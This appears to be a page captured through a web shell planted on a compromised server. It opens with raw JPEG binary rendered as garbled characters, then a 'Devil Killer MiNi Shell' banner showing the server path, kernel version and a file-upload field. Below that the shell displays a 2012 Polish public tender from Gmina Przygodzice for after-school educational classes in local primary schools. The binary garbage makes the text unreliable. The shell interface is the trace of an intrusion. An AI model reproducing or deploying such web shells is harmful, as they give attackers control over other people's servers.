JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121112/238679-N-2012.html

<p class="kh_header"><b>Przygodzice: Usługa edukacyjna</b><br>
<b>Numer ogłoszenia: 238679 - 2012; data zamieszczenia: 12.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Przygodzice , Plac Powstańców Wielkopolskich 2, 63-421 Przygodzice, woj. wielkopolskie, tel. 062 5927722, faks 062 5927000.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przygodzice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa edukacyjna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa edukacyjna polegająca na przygotowaniu i prowadzeniu zajęć edukacyjnych dla uczniów szkół podstawowych klas I-III. Usługi będą realizowane w szkołach podstawowych na terenie Gminy Przygodzice.
Zajęcia będą prowadzone w wymiarze czasowym zgodnym z § 13 ust. 1 Rozporządzenia Ministra Edukacji Narodowej z 17 listopada 2010r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach. Termin wykonania poszczególnych zajęć będzie ustalany indywidualnie z dyrektorem właściwej szkoły. Zamówienie obejmuje prowadzenie zajęć wg niżej wymienionych rodzajów przez Wykonawcę zamówienia i składa się z następujących części:
Część zamówienia nr 1 - Szkoła Podstawowa w Chynowej
Rodzaj zajęć: Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 2 - Szkoła Podstawowa w Czarnymlesie
Rodzaj zajęć: Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu
Liczba godzin ogółem: 60 h (XI-XII 2012 r. - 20 godz.; I- VI 2013 r. - 40 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 3 - Szkoła Podstawowa w Dębnicy
Rodzaj zajęć: Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 7 dzieci.
Część zamówienia nr 4 - Szkoła Podstawowa w Jankowie Przygodzkim
Rodzaj zajęć: Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 5 - Szkoła Podstawowa w Przygodzicach
Rodzaj zajęć: Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 6 - Szkoła Podstawowa w Przygodziczkach
Rodzaj zajęć: Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 7 dzieci.
Część zamówienia nr 7 - Szkoła Podstawowa w Wysocku Małym
Rodzaj zajęć: Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 8 - Szkoła Podstawowa w Chynowej
Rodzaj zajęć: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy 
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 4 dzieci.
Część zamówienia nr 9 - Szkoła Podstawowa w Dębnicy
Rodzaj zajęć: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy 
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 4 dzieci.
Część zamówienia nr 10 - Szkoła Podstawowa w Jankowie Przygodzkim
Rodzaj zajęć: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy 
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 4 dzieci.
Część zamówienia nr 11 - Szkoła Podstawowa w Przygodzicach
Rodzaj zajęć: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy 
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 4 dzieci.
Część zamówienia nr 12 - Szkoła Podstawowa w Przygodziczkach
Rodzaj zajęć: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy 
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 4 dzieci.
Część zamówienia nr 13 - Szkoła Podstawowa w Wysocku Małym
Rodzaj zajęć: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy 
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 4 dzieci.
Część zamówienia nr 14 - Szkoła Podstawowa w Chynowej
Rodzaj zajęć: Zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 11 dzieci.
Część zamówienia nr 15 - Szkoła Podstawowa w Czarnymlesie 
Rodzaj zajęć: Zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 12 dzieci.
Część zamówienia nr 16 - Szkoła Podstawowa w Dębnicy
Rodzaj zajęć: Zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 12 dzieci.
Część zamówienia nr 17 - Szkoła Podstawowa w Jankowie Przygodzkim
Rodzaj zajęć: Zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 12 dzieci.
Część zamówienia nr 18 - Szkoła Podstawowa w Przygodzicach
Rodzaj zajęć: Zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 12 dzieci.
Część zamówienia nr 19 - Szkoła Podstawowa w Wysocku Małym
Rodzaj zajęć: Zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 11 dzieci.
Część zamówienia nr 20 - Szkoła Podstawowa w Chynowej
Rodzaj zajęć: Zajęcia rozwijające u dzieci zainteresowania matematyczno-przyrodnicze
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 21 - Szkoła Podstawowa w Czarnymlesie
Rodzaj zajęć: Zajęcia rozwijające u dzieci zainteresowania matematyczno-przyrodnicze
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 22 - Szkoła Podstawowa w Dębnicy
Rodzaj zajęć: Zajęcia rozwijające u dzieci zainteresowania matematyczno-przyrodnicze
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 23 - Szkoła Podstawowa w Jankowie Przygodzkim
Rodzaj zajęć: Zajęcia rozwijające u dzieci zainteresowania matematyczno-przyrodnicze
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 24 - Szkoła Podstawowa w Przygodzicach
Rodzaj zajęć: Zajęcia rozwijające u dzieci zainteresowania matematyczno-przyrodnicze
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 25 - Szkoła Podstawowa w Przygodziczkach
Rodzaj zajęć: Zajęcia rozwijające u dzieci zainteresowania matematyczno-przyrodnicze
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 7 dzieci.
Część zamówienia nr 26 - Szkoła Podstawowa w Wysocku Małym
Rodzaj zajęć: Zajęcia rozwijające u dzieci zainteresowania matematyczno-przyrodnicze
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 27 - Szkoła Podstawowa w Chynowej
Rodzaj zajęć: Zajęcia rozwijające zainteresowania artystyczne u dzieci 
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 28 - Szkoła Podstawowa w Czarnymlesie
Rodzaj zajęć: Zajęcia rozwijające zainteresowania artystyczne u dzieci 
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 29 - Szkoła Podstawowa w Dębnicy
Rodzaj zajęć: Zajęcia rozwijające zainteresowania artystyczne u dzieci 
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 30 - Szkoła Podstawowa w Jankowie Przygodzkim
Rodzaj zajęć: Zajęcia rozwijające zainteresowania artystyczne u dzieci 
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 31 - Szkoła Podstawowa w Przygodzicach
Rodzaj zajęć: Zajęcia rozwijające zainteresowania artystyczne u dzieci 
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 32 - Szkoła Podstawowa w Przygodziczkach
Rodzaj zajęć: Zajęcia rozwijające zainteresowania artystyczne u dzieci 
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 33 - Szkoła Podstawowa w Wysocku Małym
Rodzaj zajęć: Zajęcia rozwijające zainteresowania artystyczne u dzieci 
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 8 dzieci.
Część zamówienia nr 34 - Szkoła Podstawowa w Przygodziczkach
Rodzaj zajęć: Zajęcia z arteterapii 
Liczba godzin ogółem: 30 h (XI-XII 2012 r. - 10 godz.; I- VI 2013 r. - 20 godz.), 1 grupa obejmująca 5 dzieci.
Wymagania szczegółowe związane z przedmiotem zamówienia:
1. Zamawiający wymaga, aby prowadzenie zajęć w ramach projektu odbywało się od na terenie szkoły, której dotyczą poszczególne części przedmiotu zamówienia. Opisane w zamówieniu zajęcia będą realizowane po obowiązkowych zajęciach edukacyjnych.
2. Zajęcia mają być prowadzone według zatwierdzonego programu autorskiego. Wykonawca jest zobowiązany w ciągu 7 dni od podpisania umowy przedstawić program autorski. Program ma uwzględniać potrzeby uczniów oraz rozwijać ich umiejętności w zakresie standardów kształcenia spójnych z określonymi w zamówieniu zajęciami.
3. Wykonawca jest zobowiązany prowadzić zajęcia wg otrzymanego od Zamawiającego harmonogramu. Harmonogramy będą dostarczane każdorazowo w wypadku zmiany planu zajęć szkoły. Wykonawca musi wykazać się dyspozycyjnością i elastycznością wobec zmian w harmonogramach.
4. Wykonawca jest zobowiązany dokumentować prowadzone zajęcia w dzienniku zajęć pozalekcyjnych w sposób uzgodniony z koordynatorem projektu.
5. Wykonawca jest zobowiązany do wykorzystania najnowszych narzędzi edukacyjnych, które zapewni szkoła.
6. Wykonawca jest zobowiązany do dokonywania diagnozy przyrostu wiedzy uczniów i dokonywania ewaluacji prowadzonych zajęć w odniesieniu do założonych kryteriów sukcesu i przedstawiania informacji dotyczącej ww. przynajmniej raz w semestrze.
7. Wykonawca jest zobowiązany do sporządzania:
a) wykazy przeprowadzonych godzin do listy płac*,
b) sprawozdania z realizacji wykonywanego zadania - raz na kwartał,
c) kwartalne harmonogramy form wsparcia - raz kwartał.
Ww. będą sporządzane na formularzach dostarczonych przez koordynatora projektu.
8. Wymagana jest należyta staranność przy realizacji zobowiązań umowy.

*dotyczy Wykonawcy będącego osobą fizyczną.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 34.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Udokumentowanie posiadanie stopnia awansu zawodowego minimum nauczyciela kontraktowego.
2. Udokumentowane posiadanie wykształcenia wyższego z przygotowaniem pedagogicznym i oraz szczegółowe kwalifikacje określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009r. Nr 50 poz. 400), odpowiednie dla poszczególnych części zamówienia.
Ocena spełniania ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	udokumentowane dysponowanie co najmniej jedną osobą zdolną do wykonania zamówienia oraz posiadającą wykształcenie i szczegółowe kwalifikacje niezbędne do wykonania zamówienia, odpowiednie dla poszczególnych części zamówienia wykazane w pkt 2 ppkt b, nie podlegającą wykluczeniu z postępowania, legitymującą się dokumentem potwierdzającym posiadanie wymaganego wykształcenia i szczegółowych kwalifikacji oraz aktem nadania stopnia awansu zawodowego co najmniej nauczyciela kontraktowego.
Ocena spełniania ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokument potwierdzający nadanie stopnia awansu zawodowego co najmniej nauczyciela kontraktowego.
2. Dokument potwierdzający posiadanie wyższego wykształcenia oraz szczegółowych kwalifikacji określonych w rozporządzeniu wymienionym w rozdziale 15 pkt 2 ppkt b, odpowiednich dla poszczególnych części zamówienia.
3. Wypełniony FORMULARZ OFERTY 
4. Dotyczy podmiotów występujących wspólnie:
1. Następujące dokumenty i oświadczenia składa każdy z członków konsorcjum w imieniu własnym: 
- oświadczenie o braku podstaw do wykluczenia z postępowania, 
- odpis z właściwego rejestru, 
2. Ponadto wymagane są następujące dokumenty: 
- dokument ustanawiający pełnomocnika, 
- upoważnienie pełnomocnika do reprezentowania grupy wykonawców w postępowaniu o udzielenie zamówienia lub reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w ich imieniu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiającemu przysługuje prawo do zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, w następujących sytuacjach:
a) Jeżeli zmieni się okres realizacji Projektu to może nastąpić zmiana okresu obowiązywania umowy  i wynagrodzenie będzie wypłacone wyłącznie za godziny zajęć przeprowadzone w okresie realizacji Projektu, w którym koszty  Projektu mogą być uznane za kwalifikowalne, zgodnie ze zaktualizowanym budżetem Projektu.
b) Jeżeli zmianie ulegną wytyczne lub dokumenty odnoszące się do realizacji projektu. 
c) Zamawiający zastrzega sobie prawo do zmniejszenia ilości godzin zajęć do przeprowadzenia w przypadku, gdy stwierdzi, że nie leży to w jego interesie lub nie zgromadził odpowiedniej liczby uczestników chętnych do rozpoczęcia zajęć lub w trakcie realizacji zajęć liczba uczestników zmalała w ten sposób, że może to spowodować nieosiągnięcie założonych rezultatów Projektu. W takim przypadku wynagrodzenie Wykonawcy ulegnie zmniejszeniu proporcjonalnie do liczby godzin zrealizowanych przez Wykonawcę do obliczenia którego zostanie przyjęta cena jednostkowa brutto za 1 h.
d) Jeżeli zaistnieją jakiekolwiek inne okoliczności, których Zamawiający ani Wykonawca nie mogli przewidzieć w chwili podpisywania umowy, a które mogą mieć wpływ na prawidłową realizację Projektu.
e) zmiany osoby prowadzącej  zajęcia wyłącznie w  przypadkach i na zasadach określonych w § 2 niniejszej umowy.
f) zmiana harmonogramu zajęć</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.przygodzice.pl<br>
